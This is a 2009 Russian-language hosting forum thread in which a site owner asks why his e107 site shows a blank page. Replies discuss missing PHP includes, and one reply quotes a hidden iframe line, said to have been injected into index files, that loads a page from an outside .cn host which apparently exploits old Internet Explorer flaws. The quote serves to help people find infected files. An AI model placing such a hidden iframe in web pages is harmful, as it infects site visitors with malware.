Ayola.net
Новости: В связи с обилием спама, постинг на форуме временно закрыт.

Для связи с поддержкой используйте тикеты в панели управления.
 
*
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь. Октябрь 23, 2017, 22:22:20


Войти


Страниц: [1]
  Печать  
Автор Тема: Взломали сайт?  (Прочитано 6743 раз)
0 Пользователей и 1 Гость смотрят эту тему.
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« : Май 17, 2009, 15:28:50 »

Здравствуйте!
У меня большая проблема...
Не знаю что случилось, ничего в настройках не изменял, сайт работает почти год и тут, при загрузке любой страницы браузер отображает белую пустую страницу  Грустный (любой браузер)
Подскажите пожалуйста, з чем это может быть связано, если надо изменять настройки, тогда как войти в админ-панель Непонимающий
« Последнее редактирование: Май 27, 2009, 04:28:17 от многоенепонимающий » Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #1 : Май 17, 2009, 15:31:07 »

url: http://tecktonik.co.ua
Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #2 : Май 22, 2009, 04:03:05 »

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /www_host/hosts/tecktonik.ex6.ru/e107_themes/mp3/theme.php on line 89

Fatal error: require_once() [function.require]: Failed opening required '/www_host/hosts/tecktonik.ex6.ru/65346dd7098c18803ac8e5580ebd457b/sape.php' (include_path='.:') in /www_host/hosts/tecktonik.ex6.ru/e107_themes/mp3/theme.php on line 93


Вот это появляется при попытке открыть сайт
Записан
gromit
Новичёк
*

Карма: 0
Сообщений: 31


Просмотр профиля WWW
« Ответ #3 : Май 26, 2009, 18:24:02 »

Ищите ошибки в коде. Может взломал кто-то
Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #4 : Май 27, 2009, 04:26:07 »

Как взломал? не может быть, здесь написано о коде "сапе"
Как мне исправить эту ошибку? Непонимающий
Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #5 : Май 27, 2009, 04:27:45 »

Знаете, даже через ФТП не могу соединиться  Плачущий
Записан
Cawko
Вникающий
***

Карма: 0
Сообщений: 203


Просмотр профиля
« Ответ #6 : Май 27, 2009, 07:19:54 »

такое ощущение что у тебя это путь к к какому то граберу или скрипту на подобии.так?
Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #7 : Май 28, 2009, 16:19:05 »

это путь к коду "sape", который я хотел поставить но потом передумал (не понимаю почему запрашиваеться именно этот путь, так как я ничего не изменял и сайт работал)
Помогите пожалуйста, кто знает Грустный
Записан
многоенепонимающий
Новичёк
*

Карма: 0
Сообщений: 19


Просмотр профиля
« Ответ #8 : Май 28, 2009, 16:23:54 »

ФТП уже работает, проводились внеплановые работы...
Подскажите можно что либо сделать через фтп?
Записан
simba
Новичёк
*

Карма: 0
Сообщений: 42


Просмотр профиля WWW
« Ответ #9 : Май 29, 2009, 06:13:04 »

Ошибка из-за того что не может проинклудить файлы. Какие там указано. Или ты их удалил или вписал или кто-то за тебя это сделал. Улыбающийся проверяй есть файлы или пути к файлам проверяй.
Записан

smax71
Новичёк
*

Карма: 0
Сообщений: 1


Просмотр профиля
« Ответ #10 : Май 30, 2009, 17:43:49 »

Проверьте все файлы php в названии которых есть слово index. Скорее всего в конце файлов есть строка: <iframe src=\"http://yournameheremedia.cn:8080/ts/in.cgi?pepsi29\" style=\"visibility: hidden; top:-9875px;position:absolute;\"></iframe>. Китайцы постарались. По ссылке из добавленной строки ходить не советую!!! У меня Винда вылетает. Об этом написал: http://www.broda.net.ru/?p=1412
Записан
Cawko
Вникающий
***

Карма: 0
Сообщений: 203


Просмотр профиля
« Ответ #11 : Июнь 05, 2009, 04:16:43 »

гг.кто о чём
Записан
Astraller™
Маэстро
*****

Карма: 151
Сообщений: 1389

Вселенское зло


Просмотр профиля WWW
« Ответ #12 : Июнь 05, 2009, 13:22:10 »

По ссылке из добавленной строки ходить не советую!!! У меня Винда вылетает. Об этом написал: http://www.broda.net.ru/?p=1412
Браузер блин, нормальный использовать надо Улыбающийся
Сходил, посмотрел код, порадовался Улыбающийся В очередной раз юзают старые дыры IE с переполнением буфера.
Записан

Гамлета здесь больше нет. Осталась только тень.
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.13 | SMF © 2006, Simple Machines LLC

2003-2008 © ООО "Инфотур" - Бесплатный хостинг Ayola.net
Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM
Страница сгенерирована за 0.063 секунд. Запросов: 17.